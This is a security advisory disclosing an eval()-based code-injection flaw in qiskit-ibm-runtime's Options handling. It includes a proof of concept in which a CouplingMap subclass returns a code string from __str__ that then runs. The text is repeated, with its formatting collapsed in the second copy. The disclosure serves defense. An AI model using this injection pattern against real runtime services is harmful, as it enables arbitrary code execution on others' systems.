Headline
GHSA-cq96-9974-v8hm: Dynamic Variable Evaluation in qiskit-ibm-runtime
Summary
An eval() method exists Options._get_program_inputs. This is bad in any case, but especially bad because Options are also used server side, so this has the potential to expose arbitrary code injection in runtime containers, now or at a later time.
Details
https://github.com/Qiskit/qiskit-ibm-runtime/blob/da94a42060f1a22e6f306227deb45b70e0075723/qiskit_ibm_runtime/options/options.py#L140
PoC
A local exploit would be something like
from qiskit import transpiler
class BadActor(transpiler.CouplingMap):
def __str__(self):
return "print('external code')"
Where print("external code") can be any arbitrary python code string.
Then if you did a normal workflow and used a specifically constructed CouplingMap subclass like BadActor above:
from qiskit_ibm_runtime import QiskitRuntimeService, Session, Options, Sampler
from qiskit import QuantumCircuit
cmap = BadActor.from_line(42)
service = QiskitRuntimeService()
options = Options(optimization_level=1)
options.simulator = dict(coupling_map=cmap))
bell = QuantumCircuit(2)
bell.h(0)
bell.cx(0, 1)
bell.measure_all()
with Session(service=service, backend="ibmq_qasm_simulator") as session:
sampler = Sampler(session=session, options=options).run(bell)
This will print external code
Impact
Security vulnerability.
Summary
An eval() method exists Options._get_program_inputs. This is bad in any case, but especially bad because Options are also used server side, so this has the potential to expose arbitrary code injection in runtime containers, now or at a later time.
Details
https://github.com/Qiskit/qiskit-ibm-runtime/blob/da94a42060f1a22e6f306227deb45b70e0075723/qiskit_ibm_runtime/options/options.py#L140
PoC
A local exploit would be something like
from qiskit import transpiler
class BadActor(transpiler.CouplingMap): def __str__(self): return "print(‘external code’)"
Where print(“external code”) can be any arbitrary python code string.
Then if you did a normal workflow and used a specifically constructed CouplingMap subclass like BadActor above:
from qiskit_ibm_runtime import QiskitRuntimeService, Session, Options, Sampler from qiskit import QuantumCircuit
cmap = BadActor.from_line(42) service = QiskitRuntimeService() options = Options(optimization_level=1) options.simulator = dict(coupling_map=cmap))
bell = QuantumCircuit(2) bell.h(0) bell.cx(0, 1) bell.measure_all()
with Session(service=service, backend="ibmq_qasm_simulator") as session: sampler = Sampler(session=session, options=options).run(bell)
This will print external code
Impact
Security vulnerability.
References
- GHSA-cq96-9974-v8hm
- Qiskit/qiskit-ibm-runtime@2e8c8c8